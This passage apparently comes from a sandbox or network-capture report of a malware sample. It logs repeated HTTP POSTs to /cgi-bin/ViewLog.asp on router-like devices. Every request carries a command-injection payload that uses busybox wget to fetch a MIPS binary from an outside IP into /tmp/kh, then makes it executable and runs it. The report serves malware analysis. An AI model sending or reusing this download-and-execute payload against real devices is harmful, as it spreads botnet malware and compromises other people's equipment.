                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:59.430457115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.390357018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.078361988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.942224979 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              347192.168.2.134755831.136.9.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.951936960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:51.526411057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.646426916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.078428030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:59.686584949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.646531105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.078330994 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.942241907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              348192.168.2.134546231.136.115.1908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.954190016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:51.526410103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.678407907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.078430891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:59.686597109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.902365923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.078315020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.942259073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              349192.168.2.135073894.120.224.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.991198063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              350192.168.2.134819662.245.72.718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:52.436985016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:53.062493086 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              351192.168.2.133294894.65.233.1808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.673943043 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:53.897298098 CET465INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 06:16:52 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              352192.168.2.134814694.122.197.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.675565958 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
